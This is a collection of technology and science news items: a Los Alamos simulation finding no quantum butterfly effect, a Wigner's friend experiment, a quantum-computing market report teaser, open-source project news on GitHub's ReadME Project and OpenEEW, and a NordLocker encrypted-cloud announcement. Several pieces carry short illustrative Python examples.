Does the Butterfly Effect Exist? Maybe, But Not in the Quantum Realm – Discover Magazine

In "A Sound of Thunder," the short story by Ray Bradbury, the main character travels back in time to hunt dinosaurs. He crushes a butterfly underfoot in the prehistoric jungle, and when he returns to the present, the world he knows is changed: the feel of the air, a sign in an office, the election of a U.S. president. The butterfly was a small thing that could upset balances and knock down a line of small dominoes and then big dominoes and then gigantic dominoes, all down the years across Time.

This butterfly effect that Bradbury illustrated, in which a small change in the past produces enormous future effects, is not reserved for fiction. As the famed mathematician and meteorologist Edward Lorenz discovered by accident, natural systems do exist in which tiny shifts in initial conditions can lead to wildly different outcomes. These systems, including the weather and even the way fluids mix, are known as chaotic. Chaotic systems are normally understood within the realm of classical physics, the framework we use to predict how objects will move to a certain degree of accuracy (think motion, force or momentum from your high school science class).
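
To make that sensitivity concrete, here is a minimal Python sketch (the step size and starting points are illustrative choices, not anything from the study) that integrates Lorenz's own equations for two trajectories whose starting points differ by one part in a million:

```python
import numpy as np

def lorenz_step(state, dt=0.01, sigma=10.0, rho=28.0, beta=8.0 / 3.0):
    """One Euler step of the Lorenz equations, the textbook chaotic system."""
    x, y, z = state
    deriv = np.array([sigma * (y - x), x * (rho - z) - y, x * y - beta * z])
    return state + dt * deriv

a = np.array([1.0, 1.0, 1.0])       # one trajectory
b = a + np.array([1e-6, 0.0, 0.0])  # the "butterfly": a one-in-a-million nudge

for step in range(5001):
    if step % 1000 == 0:
        print(f"t = {step * 0.01:5.1f}, separation = {np.linalg.norm(a - b):.2e}")
    a, b = lorenz_step(a), lorenz_step(b)
```

Early in the run the separation stays near one millionth; by the end it has grown to the same order as the attractor itself, which is the butterfly effect in miniature.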

But a new study shows that the effect doesn't hold in the quantum realm. Two researchers at Los Alamos National Laboratory in New Mexico created a simulation in which a qubit, a quantum bit, moved backward and forward in time on a quantum computer. Despite being damaged, the qubit held on to its original information instead of becoming unrecognizable like the time traveler's world after he killed the butterfly. In the study, the process used to simulate time travel forward and backward is known as evolution.

"From the point of view of classical physics, it's very unexpected, because classical physics predicts that complex evolution has a butterfly effect, so that small changes deep in the past lead to huge changes in our world," says Nikolai Sinitsyn, a theoretical physicist and one of the researchers who conducted the study.

The finding furthers our understanding of quantum systems, and also has potential applications in securing information systems and even determining the quantum-ness of a quantum processor.

The rules of the quantum realm, which describe how subatomic particles move, can be truly mind-boggling because they defy traditional logic. But briefly: particles as small as electrons and protons don't just exist at one point in space; they can occupy many at a time. The mathematical framework of quantum mechanics tries to explain the motion of these particles.

The laws of quantum mechanics can also be applied to quantum computers. These are very different from the computers we use today, and they can solve certain problems exponentially faster than normal computers because they adhere to these completely different laws of physics. A standard computer uses bits with a value of either 0 or 1. A quantum computer uses qubits, which can attain a kind of combined state of 0 and 1, a unique characteristic of quantum systems (an electron, for example) called superposition.
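
For readers who want to see what superposition looks like on paper, a qubit is just a two-component complex vector, and the probabilities of reading 0 or 1 are the squared magnitudes of its entries. A minimal NumPy sketch, illustrative only and not tied to any particular quantum-computing library:

```python
import numpy as np

# Basis states |0> and |1> as vectors.
zero = np.array([1.0, 0.0], dtype=complex)
one = np.array([0.0, 1.0], dtype=complex)

# An equal superposition: the qubit is "both" 0 and 1 until measured.
psi = (zero + one) / np.sqrt(2)

# Born rule: probabilities are squared amplitudes.
p0, p1 = np.abs(psi) ** 2
print(f"P(0) = {p0:.2f}, P(1) = {p1:.2f}")  # 0.50 each
```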

In a quantum system, small changes to qubits, even looking at or measuring them, can have immense effects. So in the new study, the researchers wanted to see what would happen when they simulated sending a qubit back in time while also damaging it. Researchers constructing quantum experiments often use the stand-ins Alice and Bob to illustrate their theoretical process. In this case, they let Alice bring her qubit back in time, scrambling the information as part of what they call reverse evolution. Once in the past, Bob, an intruder, measures Alice's qubit, changing it. Alice then brings her qubit forward in time.

If the butterfly effect had held, the original information in Alice's qubit would have been changed beyond recognition. But instead, the evolution forward in time allowed Alice to recover the original information, even though Bob's intrusion had destroyed all the connections between her qubit and the others that traveled with hers.
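
The logic of the protocol can be imitated in a toy state-vector simulation. To be clear, this is not Yan and Sinitsyn's actual circuit (their experiment uses a scrambling circuit and a dedicated decoding measurement on quantum hardware); it is a sketch of the same story under simplifying assumptions: run the inverse of a scrambling unitary to go "to the past," let Bob measure one qubit there, run the unitary forward again, and check how much of Alice's qubit survives.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 6                # total qubits; qubit 0 (most significant bit) is Alice's
dim = 2 ** n

def random_unitary(d):
    """Roughly Haar-random unitary via QR of a complex Gaussian matrix."""
    m = rng.normal(size=(d, d)) + 1j * rng.normal(size=(d, d))
    q, r = np.linalg.qr(m)
    return q * (np.diagonal(r) / np.abs(np.diagonal(r)))

U = random_unitary(dim)               # stand-in for scrambling "evolution"

psi = np.zeros(dim, dtype=complex)
psi[0] = 1.0                          # Alice's qubit in |0>, the rest in |0...0>

past = U.conj().T @ psi               # reverse evolution: travel to the past

# Bob the intruder measures the last qubit there (keep the outcome-0 branch).
keep = (np.arange(dim) & 1) == 0
damaged = np.where(keep, past, 0.0)
damaged /= np.linalg.norm(damaged)

present = U @ damaged                 # forward evolution: return to the present

# Probability that Alice's qubit still reads 0 (indices with qubit 0 equal to 0).
p_alice0 = np.sum(np.abs(present[: dim // 2]) ** 2)
print(f"P(Alice's qubit unchanged) = {p_alice0:.3f}")
```

For a scrambling unitary, this probability typically stays well above the 0.5 that complete information loss would imply; Yan and Sinitsyn's actual decoding recovers the qubit with far higher fidelity, but even this toy shows the damage does not snowball the way a classical butterfly effect would.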

"So normally, many people believe that if you go back in time and scramble the information, that information is lost forever," says Jordan Kyriakidis, an expert in quantum computing and former physicist at Dalhousie University in Nova Scotia. "What they have shown in this paper is that for quantum systems, under certain circumstances, if you go back in time, you can recover the original information even though someone tried to scramble it on you."

So does this mean that the butterfly effect doesn't exist at all? No. Sinitsyn and his coauthor, Bin Yan, showed it doesn't exist within the quantum realm, specifically.

But this does have implications for real-world problems. One is information encryption. Encryption has two important principles: information should be hidden so well that no one unauthorized can get to it, but the intended recipient should be able to reliably decipher it. For example, explains Kyriakidis, if a hacker attempts to crack a code that hides information in today's world, the hacker might not be able to get to it, but they could damage it irreparably, preventing anyone from reading the original message. This study may point to a way to avoid that by protecting information even after it is damaged, so the intended recipient can still interpret it.

And because this effect (or non-effect) is so particular to quantum systems, it could theoretically be used to test the integrity of a quantum computer. If one were to replicate Yan and Sinitsyn's protocol in a quantum computer, according to the study, it would confirm that the system was truly operating by quantum principles. Because quantum computers are highly prone to errors, a tool to easily test how well they work has huge value. A reliable quantum computer can solve incredibly complex problems, with applications ranging from chemistry and medicine to traffic direction and financial strategy.

Quantum computing is still in its infancy, but if Yan and Sinitsyn's quantum time machine can exist in a realm usually reserved for subatomic particles, well, the possibilities could be endless.


Quantum Computing Market: Size, Share, Analysis, Regional Outlook and Forecast 202 – News by aeresearch

The Global Quantum Computing Market Size study report, which factors in the effects of COVID-19, is an in-depth evaluation of present industrial conditions and the overall size of the quantum computing industry, estimated from 2020 to 2025. The report also provides a detailed overview of leading industry initiatives, potential market share, and business-oriented planning. It discusses the favorable factors in current industrial conditions, the market's growth levels and demand, and the distinct business strategies used by manufacturers, together with their future prospects.

The latest report on the Quantum Computing market is drafted with the aim of providing a competitive edge to organizations operating in this business space through a thorough analysis of global trends. The document enables companies to understand prevailing market dynamics as well as growth prospects so as to form important expansion strategies.

The study highlights the main drivers and opportunities that will influence the industry's remuneration over the forecast period. It also lists the challenges and threats hampering market growth and provides recommendations for overcoming these hurdles.

Request Sample Copy of this Report @ https://www.aeresearch.net/request-sample/279803

The Quantum Computing market report offers a comparative analysis of past and present business outlooks to infer the industry's growth rate over the analysis timeframe. Moreover, the report includes in-depth scrutiny of the impact of COVID-19 on the market landscape, alongside strategies to guide industry participants in converting this global distress into profitability.

Key pointers from the table of contents:

Product scope

Application spectrum

Regional terrain

Competitive hierarchy

All in all, the report examines the Quantum Computing market qualitatively and quantitatively, considering different segmentations and focusing on other important aspects such as the supply chain and sales channels, to infer overall industry growth over the forecast period.

Questions Answered by the Report:

Which are the dominant players of the global Quantum Computing market?

What will be the size of the global Quantum Computing market in the coming years?

Which segment will lead the global Quantum Computing market?

How will the market development trends change in the next five years?

What is the nature of the competitive landscape of the global Quantum Computing market?

What are the go-to strategies adopted in the global Quantum Computing market?

Table of Contents:

1 Study Coverage

1.1 Quantum Computing Product Introduction

1.2 Key Market Segments in This Study

1.3 Key Manufacturers Covered: Ranking of Global Top Quantum Computing Manufacturers by Revenue in 2019

1.4 Market by Type

1.4.1 Global Quantum Computing Market Size Growth Rate by Type

1.5 Market by Application

1.5.1 Global Quantum Computing Market Size Growth Rate by Application

1.6 Study Objectives

1.7 Years Considered

2 Executive Summary

2.1 Global Quantum Computing Market Size, Estimates and Forecasts

2.1.1 Global Quantum Computing Revenue Estimates and Forecasts 2015-2026

2.1.2 Global Quantum Computing Production Capacity Estimates and Forecasts 2015-2025

2.1.3 Global Quantum Computing Production Estimates and Forecasts 2015-2025

2.2 Global Quantum Computing Market Size by Producing Regions: 2015 VS 2020 VS 2025

2.3 Analysis of Competitive Landscape

2.3.1 Manufacturers Market Concentration Ratio (CR5 and HHI)

2.3.2 Global Quantum Computing Market Share by Company Type

2.3.3 Global Quantum Computing Manufacturers Geographical Distribution

2.4 Key Trends for Quantum Computing Markets & Products

2.5 Primary Interviews with Key Quantum Computing Players (Opinion Leaders)

3 Market Size by Manufacturers

3.1 Global Top Quantum Computing Manufacturers by Production Capacity

3.1.1 Global Top Quantum Computing Manufacturers by Production Capacity (2015-2020)

3.1.2 Global Top Quantum Computing Manufacturers by Production (2015-2020)

3.1.3 Global Top Quantum Computing Manufacturers Market Share by Production

3.2 Global Top Quantum Computing Manufacturers by Revenue

3.2.1 Global Top Quantum Computing Manufacturers by Revenue (2015-2020)

3.2.2 Global Top Quantum Computing Manufacturers Market Share by Revenue (2015-2020)

3.2.3 Global Top 10 and Top 5 Companies by Quantum Computing Revenue in 2019

3.3 Global Quantum Computing Price by Manufacturers

3.4 Mergers & Acquisitions, Expansion Plans

Request Customization on This Report @ https://www.aeresearch.net/request-for-customization/279803


This Twist on Schrödinger's Cat Paradox Has Major Implications for Quantum Theory – Scientific American

What does it feel like to be both alive and dead?

That question irked and inspired Hungarian-American physicist Eugene Wigner in the 1960s. He was frustrated by the paradoxes arising from the vagaries of quantum mechanics, the theory governing the microscopic realm that suggests, among many other counterintuitive things, that until a quantum system is observed, it does not necessarily have definite properties. Take his fellow physicist Erwin Schrödinger's famous thought experiment, in which a cat is trapped in a box with poison that will be released if a radioactive atom decays. Radioactivity is a quantum process, so before the box is opened, the story goes, the atom has both decayed and not decayed, leaving the unfortunate cat in limbo, a so-called superposition between life and death. But does the cat experience being in superposition?

Wigner sharpened the paradox by imagining a (human) friend of his shut in a lab, measuring a quantum system. He argued it was absurd to say his friend exists in a superposition of having seen and not seen a decay unless and until Wigner opens the lab door. "The Wigner's friend thought experiment shows that things can become very weird if the observer is also observed," says Nora Tischler, a quantum physicist at Griffith University in Brisbane, Australia.

Now Tischler and her colleagues have carried out a version of the Wigner's friend test. By combining the classic thought experiment with another quantum head-scratcher called entanglement, a phenomenon that links particles across vast distances, they have also derived a new theorem, which they claim puts the strongest constraints yet on the fundamental nature of reality. Their study, which appeared in Nature Physics on August 17, has implications for the role that consciousness might play in quantum physics, and even for whether quantum theory must be replaced.

The new work is "an important step forward in the field of experimental metaphysics," says quantum physicist Aephraim Steinberg of the University of Toronto, who was not involved in the study. "It's the beginning of what I expect will be a huge program of research."

Until quantum physics came along in the 1920s, physicists expected their theories to be deterministic, generating predictions for the outcome of experiments with certainty. But quantum theory appears to be inherently probabilistic. The textbook version, sometimes called the Copenhagen interpretation, says that until a system's properties are measured, they can encompass myriad values. This superposition only collapses into a single state when the system is observed, and physicists can never precisely predict what that state will be. Wigner held the then popular view that consciousness somehow triggers a superposition to collapse. Thus, his hypothetical friend would discern a definite outcome when she or he made a measurement, and Wigner would never see her or him in superposition.

This view has since fallen out of favor. "People in the foundations of quantum mechanics rapidly dismiss Wigner's view as spooky and ill-defined because it makes observers special," says David Chalmers, a philosopher and cognitive scientist at New York University. Today most physicists concur that inanimate objects can knock quantum systems out of superposition through a process known as decoherence. Certainly, researchers attempting to manipulate complex quantum superpositions in the lab can find their hard work destroyed by speedy air particles colliding with their systems. So they carry out their tests at ultracold temperatures and try to isolate their apparatuses from vibrations.

Several competing quantum interpretations have sprung up over the decades that employ less mystical mechanisms, such as decoherence, to explain how superpositions break down without invoking consciousness. Other interpretations hold the even more radical position that there is no collapse at all. Each has its own weird and wonderful take on Wigner's test. The most exotic is the many-worlds view, which says that whenever you make a quantum measurement, reality fractures, creating parallel universes to accommodate every possible outcome. Thus, Wigner's friend would split into two copies, and "with good enough supertechnology," he could indeed measure that person to be in superposition from outside the lab, says quantum physicist and many-worlds fan Lev Vaidman of Tel Aviv University.

The alternative Bohmian theory (named for physicist David Bohm) says that at the fundamental level, quantum systems do have definite properties; we just do not know enough about those systems to precisely predict their behavior. In that case, the friend has a single experience, but Wigner may still measure that individual to be in a superposition because of his own ignorance. In contrast, a relative newcomer on the block called the QBism interpretation embraces the probabilistic element of quantum theory wholeheartedly. (QBism, pronounced "cubism," is actually short for quantum Bayesianism, a reference to 18th-century mathematician Thomas Bayes's work on probability.) QBists argue that a person can only use quantum mechanics to calculate how to calibrate his or her beliefs about what he or she will measure in an experiment. "Measurement outcomes must be regarded as personal to the agent who makes the measurement," says Ruediger Schack of Royal Holloway, University of London, who is one of QBism's founders. According to QBism's tenets, quantum theory cannot tell you anything about the underlying state of reality, nor can Wigner use it to speculate on his friend's experiences.

Another intriguing interpretation, called retrocausality, allows events in the future to influence the past. "In a retrocausal account, Wigner's friend absolutely does experience something," says Ken Wharton, a physicist at San Jose State University, who is an advocate for this time-twisting view. "But that 'something' the friend experiences at the point of measurement can depend upon Wigner's choice of how to observe that person later."

The trouble is that each interpretation is equally good, or bad, at predicting the outcome of quantum tests, so choosing between them comes down to taste. "No one knows what the solution is," Steinberg says. "We don't even know if the list of potential solutions we have is exhaustive."

Other models, called collapse theories, do make testable predictions. These models tack on a mechanism that forces a quantum system to collapse when it gets too big, explaining why cats, people and other macroscopic objects cannot be in superposition. Experiments are underway to hunt for signatures of such collapses, but as yet they have not found anything. Quantum physicists are also placing ever larger objects into superposition: last year a team in Vienna reported doing so with a 2,000-atom molecule. Most quantum interpretations say there is no reason why these efforts to supersize superpositions should not continue upward forever, presuming researchers can devise the right experiments in pristine lab conditions so that decoherence can be avoided. Collapse theories, however, posit that a limit will one day be reached, regardless of how carefully experiments are prepared. "If you try and manipulate a classical observer, a human, say, and treat it as a quantum system, it would immediately collapse," says Angelo Bassi, a quantum physicist and proponent of collapse theories at the University of Trieste in Italy.

Tischler and her colleagues believed that analyzing and performing a Wigner's friend experiment could shed light on the limits of quantum theory. They were inspired by a new wave of theoretical and experimental papers that have investigated the role of the observer in quantum theory by bringing entanglement into Wigner's classic setup. Say you take two particles of light, or photons, that are polarized so that they can vibrate horizontally or vertically. The photons can also be placed in a superposition of vibrating both horizontally and vertically at the same time, just as Schrödinger's paradoxical cat can be both alive and dead before it is observed.

Such pairs of photons can be prepared together, entangled, so that their polarizations are always found to be in the opposite direction when observed. That may not seem strange, unless you remember that these properties are not fixed until they are measured. Even if one photon is given to a physicist called Alice in Australia, while the other is transported to her colleague Bob in a lab in Vienna, entanglement ensures that as soon as Alice observes her photon and, for instance, finds its polarization to be horizontal, the polarization of Bob's photon instantly syncs to vibrating vertically. Because the two photons appear to communicate faster than the speed of light, something prohibited by his theories of relativity, this phenomenon deeply troubled Albert Einstein, who dubbed it "spooky action at a distance."

These concerns remained theoretical until the 1960s, when physicist John Bell devised a way to test whether reality is truly spooky, or whether there could be a more mundane explanation behind the correlations between entangled partners. Bell imagined a commonsense theory that was local, that is, one in which influences could not travel between particles instantly. It was also deterministic rather than inherently probabilistic, so experimental results could, in principle, be predicted with certainty, if only physicists understood more about the systems' hidden properties. And it was realistic, which, to a quantum theorist, means that systems would have these definite properties even if nobody looked at them. Then Bell calculated the maximum level of correlations between a series of entangled particles that such a local, deterministic and realistic theory could support. If that threshold was violated in an experiment, then one of the assumptions behind the theory must be false.
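
Bell's threshold can be checked with a few lines of linear algebra. The sketch below (a generic CHSH calculation, the most common form of a Bell test, not the Brisbane team's code) computes the correlations for a maximally entangled photon pair at the standard measurement angles. Any local, deterministic, realistic theory caps the combined quantity S at 2, while quantum mechanics reaches 2√2 ≈ 2.83:

```python
import numpy as np

X = np.array([[0, 1], [1, 0]], dtype=complex)
Z = np.array([[1, 0], [0, -1]], dtype=complex)

def obs(theta):
    """Polarization measurement at angle theta in the X-Z plane (outcomes +/-1)."""
    return np.cos(theta) * Z + np.sin(theta) * X

def E(A, B, state):
    """Correlation <A (x) B> for a two-photon state."""
    return np.real(state.conj() @ np.kron(A, B) @ state)

# Maximally entangled pair, the kind of state used in Bell tests.
phi_plus = np.array([1, 0, 0, 1], dtype=complex) / np.sqrt(2)

# Standard CHSH settings: Alice at 0 and 90 degrees, Bob at +/-45 degrees.
a0, a1 = obs(0), obs(np.pi / 2)
b0, b1 = obs(np.pi / 4), obs(-np.pi / 4)

S = (E(a0, b0, phi_plus) + E(a0, b1, phi_plus)
     + E(a1, b0, phi_plus) - E(a1, b1, phi_plus))
print(f"S = {S:.3f}  (any local deterministic realistic theory obeys S <= 2)")
```

Running it prints S ≈ 2.828, the violation that real Bell experiments have since confirmed.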

Such Bell tests have since been carried out, with a series of watertight versions performed in 2015, and they have confirmed reality's spookiness. "Quantum foundations is a field that was really started experimentally by Bell's [theorem], now over 50 years old. And we've spent a lot of time reimplementing those experiments and discussing what they mean," Steinberg says. "It's very rare that people are able to come up with a new test that moves beyond Bell."

The Brisbane team's aim was to derive and test a new theorem that would do just that, providing even stricter constraints, "local friendliness" bounds, on the nature of reality. Like Bell's theory, the researchers' imaginary one is local. They also explicitly ban superdeterminism; that is, they insist that experimenters are free to choose what to measure without being influenced by events in the future or the distant past. (Bell implicitly assumed that experimenters can make free choices, too.) Finally, the team prescribes that when an observer makes a measurement, the outcome is a real, single event in the world: it is not relative to anyone or anything.

Testing local friendliness requires a cunning setup involving two "superobservers," Alice and Bob (who play the role of Wigner), watching their friends Charlie and Debbie. Alice and Bob each have their own interferometer, an apparatus used to manipulate beams of photons. Before being measured, the photons' polarizations are in a superposition of being both horizontal and vertical. Pairs of entangled photons are prepared such that if the polarization of one is measured to be horizontal, the polarization of its partner should immediately flip to be vertical. One photon from each entangled pair is sent into Alice's interferometer, and its partner is sent to Bob's. Charlie and Debbie are not actually human friends in this test. Rather, they are beam displacers at the front of each interferometer. When Alice's photon hits the displacer, its polarization is effectively measured, and it swerves either left or right, depending on the direction of the polarization it snaps into. This action plays the role of Alice's friend Charlie measuring the polarization. (Debbie similarly resides in Bob's interferometer.)

Alice then has to make a choice: She can measure the photon's new deviated path immediately, which would be the equivalent of opening the lab door and asking Charlie what he saw. Or she can allow the photon to continue on its journey, passing through a second beam displacer that recombines the left and right paths, the equivalent of keeping the lab door closed. Alice can then directly measure her photon's polarization as it exits the interferometer. Throughout the experiment, Alice and Bob independently choose which measurement choices to make and then compare notes to calculate the correlations seen across a series of entangled pairs.

Tischler and her colleagues carried out 90,000 runs of the experiment. As expected, the correlations violated Bell's original bounds, and crucially, they also violated the new local-friendliness threshold. The team could also modify the setup to tune down the degree of entanglement between the photons by sending one of the pair on a detour before it entered its interferometer, gently perturbing the perfect harmony between the partners. When the researchers ran the experiment with this slightly lower level of entanglement, they found a point where the correlations still violated Bell's bound but not local friendliness. This result proved that the two sets of bounds are not equivalent and that the new local-friendliness constraints are stronger, Tischler says. "If you violate them, you learn more about reality," she adds. Namely, if your theory says that "friends" can be treated as quantum systems, then you must either give up locality, accept that measurements do not have a single result that observers must agree on or allow superdeterminism. Each of these options has profound, and to some physicists distinctly distasteful, implications.

The paper is "an important philosophical study," says Michele Reilly, co-founder of Turing, a quantum-computing company based in New York City, who was not involved in the work. She notes that physicists studying quantum foundations have often struggled to come up with a feasible test to back up their big ideas. "I am thrilled to see an experiment behind philosophical studies," Reilly says. Steinberg calls the experiment "extremely elegant" and praises the team for tackling the mystery of the observer's role in measurement head-on.

Although it is no surprise that quantum mechanics forces us to give up a commonsense assumption (physicists knew that from Bell), "the advance here is that we are narrowing in on which of those assumptions it is," says Wharton, who was also not part of the study. Still, he notes, proponents of most quantum interpretations will not lose any sleep. Fans of retrocausality, such as himself, have already made peace with superdeterminism: in their view, it is not shocking that future measurements affect past results. Meanwhile QBists and many-worlds adherents long ago threw out the requirement that quantum mechanics prescribes a single outcome that every observer must agree on.

And both Bohmian mechanics and spontaneous collapse models already happily ditched locality in response to Bell. Furthermore, collapse models say that a real macroscopic friend cannot be manipulated as a quantum system in the first place.

Vaidman, who was also not involved in the new work, is less enthused by it, however, and criticizes the identification of Wigner's friend with a photon. "The methods used in the paper are ridiculous; the friend has to be macroscopic," he says. Philosopher of physics Tim Maudlin of New York University, who was not part of the study, agrees. "Nobody thinks a photon is an observer, unless you are a panpsychist," he says. Because no physicist questions whether a photon can be put into superposition, Maudlin feels the experiment lacks bite. "It rules something out, just something that nobody ever proposed," he says.

Tischler accepts the criticism. "We don't want to overclaim what we have done," she says. The key for future experiments will be scaling up the size of the "friend," adds team member Howard Wiseman, a physicist at Griffith University. The most dramatic result, he says, would involve using an artificial intelligence, embodied on a quantum computer, as the friend. Some philosophers have mused that such a machine could have humanlike experiences, a position known as the strong AI hypothesis, Wiseman notes, though nobody yet knows whether that idea will turn out to be true. But if the hypothesis holds, this quantum-based artificial general intelligence (AGI) would be microscopic. So from the point of view of spontaneous collapse models, it would not trigger collapse because of its size. If such a test were run, and the local-friendliness bound were not violated, that result would imply that an AGI's consciousness cannot be put into superposition. In turn, that conclusion would suggest that Wigner was right that consciousness causes collapse. "I don't think I will live to see an experiment like this," Wiseman says. "But that would be revolutionary."

Reilly, however, warns that physicists hoping that future AGI will help them home in on the fundamental description of reality are putting the cart before the horse. "It's not inconceivable to me that quantum computers will be the paradigm shift to get us to AGI," she says. "Ultimately, we need a theory of everything in order to build an AGI on a quantum computer, period, full stop."

That requirement may rule out more grandiose plans. But the team also suggests more modest intermediate tests involving machine-learning systems as friends, which appeals to Steinberg. "That approach is interesting and provocative," he says. "It's becoming conceivable that larger- and larger-scale computational devices could, in fact, be measured in a quantum way."

Renato Renner, a quantum physicist at the Swiss Federal Institute of Technology Zurich (ETH Zurich), makes an even stronger claim: regardless of whether future experiments can be carried out, he says, the new theorem tells us that quantum mechanics needs to be replaced. In 2018 Renner and his colleague Daniela Frauchiger, then at ETH Zurich, published a thought experiment based on Wigners friend and used it to derive a new paradox. Their setup differs from that of the Brisbane team but also involves four observers whose measurements can become entangled. Renner and Frauchiger calculated that if the observers apply quantum laws to one another, they can end up inferring different results in the same experiment.

"The new paper is another confirmation that we have a problem with current quantum theory," says Renner, who was not involved in the work. He argues that none of today's quantum interpretations can worm their way out of the so-called Frauchiger-Renner paradox without proponents admitting they do not care whether quantum theory gives consistent results. QBists offer the most palatable means of escape, because from the outset, they say that quantum theory cannot be used to infer what other observers will measure, Renner says. "It still worries me, though: If everything is just personal to me, how can I say anything relevant to you?" he adds. Renner is now working on a new theory that provides a set of mathematical rules that would allow one observer to work out what another should see in a quantum experiment.

Still, those who strongly believe their favorite interpretation is right see little value in Tischler's study. "If you think quantum mechanics is unhealthy, and it needs replacing, then this is useful because it tells you new constraints," Vaidman says. "But I don't agree that this is the case; many worlds explains everything."

For now, physicists will have to continue to agree to disagree about which interpretation is best, or whether an entirely new theory is needed. "That's where we left off in the early 20th century; we're genuinely confused about this," Reilly says. "But these studies are exactly the right thing to do to think through it."

Disclaimer: The author frequently writes for the Foundational Questions Institute, which sponsors research in physics and cosmology, and partially funded the Brisbane team's study.


GitHub's ReadME Project highlights the developers and teams behind open source software – SDTimes.com

GitHub today announced the ReadME Project, a new space designed to share and highlight open-source stories that are moving humanity forward. According to the company, while 99% of the software that powers the world is built on open-source code, the maintainers and developers of the code often go unnoticed.

"We read a lot about the preeminence of software, less so about the communities of people pouring their efforts and passions into it," Brian Douglas, senior developer advocate at GitHub, wrote in a post. "Today, and throughout the coming months, you'll read stories of personal growth, professional challenges, and lessons learned: the journeys you might not see behind projects you probably use every day."

RELATED CONTENT: What does it take to commit to 100% open source?

Open-source users can nominate inspiring developers to be highlighted. Among the first highlighted developers are:

"We hope you take something constructive from these personal profiles and merge it with your own story. Open source is incredible, uplifting, and collaborative, but it's also imperfect. All of us can learn from the creativity, grit, and perseverance of the individuals who build it," Douglas wrote. The ReadME Project features the stories of the people behind open source.


SD Times Open-Source Project of the Week: OpenEEW – SDTimes.com

This week's highlighted open-source project is OpenEEW, an open source version of Grillo's earthquake early-warning (EEW) system, designed to sense, detect, and analyze earthquakes, then alert affected communities.

The project was recently accepted into the Linux Foundation. The Linux Foundation, in collaboration with IBM, will work to accelerate the standardization and deployment of EEW systems to make communities better prepared for earthquakes.

The project was developed as a way to reduce the costs of EEW systems, accelerate deployments around the world, and save lives.

"For years we have seen that EEWs have only been possible with very significant governmental financing, due to the cost of dedicated infrastructure and development of algorithms. We expect that OpenEEW will reduce these barriers and work towards a future where everyone who lives in seismically-active areas can feel safe," said Andres Meira, founder of Grillo.

The OpenEEW Project includes hardware that can detect and transmit ground motion, real-time detection systems that can be deployed on various platforms like a Kubernetes cluster or a Raspberry Pi, and applications that allow users to receive alerts on devices, wearables, or mobile apps.
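
For a flavor of what such a real-time detection component does, here is a sketch of the classic STA/LTA (short-term average over long-term average) trigger that many seismic detection systems use. It is illustrative only, not OpenEEW's actual algorithm, and the sample trace is synthetic:

```python
import numpy as np

def sta_lta_trigger(signal, fs, sta_win=1.0, lta_win=30.0, threshold=4.0):
    """Flag samples where short-term energy jumps well above the background.

    Returns absolute sample indices where the STA/LTA ratio exceeds the
    threshold -- the classic trigger used in seismic event detection.
    """
    sta_n, lta_n = int(sta_win * fs), int(lta_win * fs)
    energy = np.asarray(signal, dtype=float) ** 2
    csum = np.concatenate(([0.0], np.cumsum(energy)))
    sta = (csum[sta_n:] - csum[:-sta_n]) / sta_n   # short-term running mean
    lta = (csum[lta_n:] - csum[:-lta_n]) / lta_n   # long-term running mean
    n = min(len(sta), len(lta))                    # align both to the trace end
    ratio = sta[-n:] / np.maximum(lta[-n:], 1e-12)
    return np.flatnonzero(ratio > threshold) + (len(energy) - n)

# Toy trace: 45 s of quiet noise, then strong shaking.
fs = 100  # samples per second
rng = np.random.default_rng(1)
trace = rng.normal(0.0, 1.0, 60 * fs)
trace[45 * fs:] += rng.normal(0.0, 10.0, 15 * fs)
triggers = sta_lta_trigger(trace, fs)
print(f"first trigger at t = {triggers[0] / fs:.2f} s")  # close to 45 s
```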

To further the project, open source contributors can contribute to the three main OpenEEW components: deploying sensors, detecting earthquakes, and sending alerts.

According to the Linux Foundation, Grillo's sensors have generated over 1 TB of data since 2017, including information from earthquakes of magnitudes 6 and 7. This data was collected in Mexico, Chile, Puerto Rico, and Costa Rica. The data is currently being used by researchers at Harvard University and the University of Oregon to develop new machine learning methods for earthquake characterization and detection.

"Understanding the ground on which Mexico City is built is an important facet of earthquake hazards. With support from the David Rockefeller Center for Latin American Studies at Harvard University and the David and Lucile Packard Foundation, we are working with Grillo to deploy a dense network of sensors across Mexico City and analyze the seismic behavior and local seismicity beneath the ancient lake basin. Our collaboration also enables open source software development for the next generation of seismology on the cloud," said Marine Denolle, professor at Harvard.


Live Webinar – The Future of Open Source Software Support – Computerworld

Open source is fundamental to modern software development. Over 90% of applications today contain open source components. Open source helps organizations move faster by allowing them to take advantage of billions of lines of code developed and shared by an open community of collaborators.

But as organizations use more and more open source, one nagging question continues to come up: who's on the hook to support all that code?

Over the past 20 years, guest speaker Al Gillen of IDC has been studying the rise of open source and the numerous methods organizations have employed to ensure the open source code they are using is supported and maintained. Lately he has been exploring new emerging models for open source support, and he recently named Tidelift an IDC Innovator in this area.

Join us on Wednesday, September 9 at 11 a.m. PST as IDC analyst Al Gillen explains the history of open source support models and his thoughts about the future of open source support. He'll be joined by Tidelift CEO and co-founder Donald Fischer.

During this webinar, Al and Donald will share:


NordLocker encryption heads to the cloud – IT PRO

NordLocker, the file encryption tool from NordSec, the company behind the well-known NordVPN, has enhanced its offering with encrypted cloud storage.

NordLocker has always protected user files on a device, and the new cloud storage feature allows users to move their data to the cloud without fear of hackers stealing it. This is a critical feature for modern business, especially with the coronavirus outbreak forcing many companies' workforces to remain remote.

There are plenty of cloud-storage options boasting encryption, but NordSec's add-on takes it a step further. Other cloud-storage solutions encrypt the storage itself, but your files are still vulnerable if a hacker breaks through the cloud's encryption. With NordLocker, your files are encrypted too, giving you double protection.

Plus, the encryption standards on your device are shared with the cloud add-on. NordLocker also limits file access to the owner and whoever the owner shares access with. With some other encrypted cloud storage options, the company offering the storage can also access the files.

According to Oliver Nobel, encryption specialist at NordLocker: "Your data is not our business. Our encryption system is designed in a way that prevents us from seeing what you keep."

Whether you need to protect photos, videos, cryptocurrencies, notes or any other files for your business or yourself, NordLocker claims to protect it all.

The NordLocker cloud's drag-and-drop interface makes it relatively easy to use, even for folks with limited tech knowledge. Users can also access their files from any computer with NordLocker installed, so there's no need to panic if you switch to a new computer or need to download a piece of software when you're away from the office.

NordLocker offers a free 3GB cloud storage plan with unlimited encryption, no credit card required. If you need more space, you can upgrade to 500GB of cloud storage for $3.00 per month. There are also customizable business accounts for larger companies.


Encryption and endpoint control: the heroes of post-lockdown data security – TEISS

